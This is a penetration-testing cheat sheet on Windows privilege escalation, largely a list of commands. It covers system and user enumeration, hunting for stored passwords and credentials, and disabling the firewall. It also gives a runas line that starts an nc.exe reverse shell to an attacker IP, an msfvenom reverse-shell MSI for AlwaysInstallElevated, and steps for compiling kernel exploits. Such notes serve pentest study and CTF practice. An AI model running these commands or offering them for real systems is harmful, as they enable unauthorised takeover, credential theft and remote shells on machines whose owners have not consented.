Windows Privilege Escalation

Enumeration

    OS Info Enumeration
      systeminfo
      hostname
      echo %username%
      wmic qfe -> check patches
      wmic logicaldisk -> get other disk information
    User Enumeration
      whoami
      whoami /priv -> check user privilleges
      whoami /groups -> check user groups
      net user -> list all users
      net user <username> -> check groups associated with a user
      net localgroup -> Check all the local groups available
      net localgroup <group name> -> List the members of the given localgroup
    Task | Service | Process Enumeration
      sc queryex type= service (Lists all the service)
      tasklist /SVC
      tasklist
      net start
      DRIVERQUERY
      wmic product get name, version, vendor
    Permission Enumeration
      C:\Program Files : icacls program_name
      icacls root.txt /grant <username>:F (to grant permission to access file)
      Check the PowerShell history file type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
      Check stored usernames and passwords
        cmdkey /list
    ​
    Network based
      ipconfig
      ipconfig /all
      arp -a
      router print
      netstat -ano
    ​
    Password Hunting
      1
      findstr /si password *.txt *.ini *.config (try searching in different directories)
      2
      dir /s *pass* == *cred* == *vnc* == *.config*
      3
      dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
      4
      where /R C:\ user.txt
      5
      where /R C:\ *.ini
      Copied!
    ​
    AV / Firewall check / Service Enumeration
1
sc query windefend
2
netsh advfirewall firewall dump
3
netsh advfirewall show currentprofile
4
netsh advfirewall firewall show rule name=all
5
netsh firewall show state (show firewall running or stopped)
6
netsh firewall show config (show firewall configuration)
7
​
8
netsh firewall set opmode disable # Disable firewall
Copied!
    Scheduled Tasks
1
schtasks /query /fo LIST /v
Copied!
    Mount Information
      mountvol

Escalation Techniques

Service Account Priv Esc (Token Impersonation)
    whoami /priv
Run As :
Use the cmdkey to list the stored credentials on the machine.
1
cmdkey /list
2
Currently stored credentials:
3
Target: Domain:interactive=WORKGROUP\Administrator
4
Type: Domain Password
5
User: WORKGROUP\Administrator
Copied!
Using runas with a provided set of credential.
1
runas /savecred /user:admin C:\PrivEsc\reverse.exe
Copied!
1
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Copied!
Access check :
    accesschk.exe -ucqv [service_name] /accepteula
    accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
    Find all weak folder permissions per drive.
      accesschk.exe /accepteula -uwdqs Users c:\
      accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
    Find all weak file permissions per drive.
      accesschk.exe /accepteula -uwsv "Everyone" "C:\Program Files"
      accesschk.exe /accepteula -uwqs Users c:\*.*
      accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
    Powershell:
1
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Copied!
Unquoted Service Path Privilege Escalation

PATH directories with weak permissions

1
C:\Temp> for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
2
C:\Temp> for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
3
​
4
C:\Temp> sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
5
C:\Temp> type Servicenames.txt
6
C:\Temp> FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
7
C:\Temp> FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Copied!
Always Install Elevated :
1
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
2
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
3
​
4
msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 –f msi > install.msi
5
​
6
C:> msiexec /quiet /qn /i install.msi
Copied!
Kernel Exploits :
1
i686-w64-mingw32-gcc exploit.c -o exploit
Copied!
or for 32 bit
1
i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32
Copied!

Automated Enumeration Tools

Powershell:
Metasploit :
    getsystem
    run post/multi/recon/local_exploit_suggester
Resources :
Last modified 5mo ago